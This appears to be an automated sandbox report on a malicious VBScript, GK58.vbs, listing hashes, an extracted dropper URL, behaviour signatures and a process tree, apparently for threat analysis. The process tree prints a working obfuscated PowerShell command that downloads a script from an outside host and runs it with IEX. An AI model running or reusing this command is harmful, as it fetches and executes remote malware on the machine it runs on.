Analysis

  • max time kernel
    9s
  • max time network
    9s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-05-2021 07:02

General

  • Target

    GK58.vbs

  • Size

    436B

  • MD5

    a3f4ec37e400752adb85a34e63560be8

  • SHA1

    b20367d00c0bd8ed3f9df0838c237267b7694a84

  • SHA256

    32696fdc1973162602638cdec277dde152bf855ee4be61a47258fd7b09354b65

  • SHA512

    93f0b8cb8d08d03510f5a4ccf7470bf3620df2da8f7e77cc4790cefbae461ee9ff5fb3b4961adf40061264e1032e09165078d433f3d4805f9a9f419f8ea8b1a1

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://teammagical.com/3.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GK58.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://teammagical.com/3.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2028

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1632-60-0x000007FEFC031000-0x000007FEFC033000-memory.dmp
    Filesize

    8KB

  • memory/2028-61-0x0000000000000000-mapping.dmp
  • memory/2028-63-0x0000000002310000-0x0000000002311000-memory.dmp
    Filesize

    4KB

  • memory/2028-64-0x000000001ABF0000-0x000000001ABF1000-memory.dmp
    Filesize

    4KB

  • memory/2028-65-0x000000001AA70000-0x000000001AA72000-memory.dmp
    Filesize

    8KB

  • memory/2028-66-0x000000001AA74000-0x000000001AA76000-memory.dmp
    Filesize

    8KB

  • memory/2028-67-0x0000000002550000-0x0000000002551000-memory.dmp
    Filesize

    4KB

  • memory/2028-68-0x0000000001EC0000-0x0000000001EC1000-memory.dmp
    Filesize

    4KB

  • memory/2028-69-0x000000001B550000-0x000000001B551000-memory.dmp
    Filesize

    4KB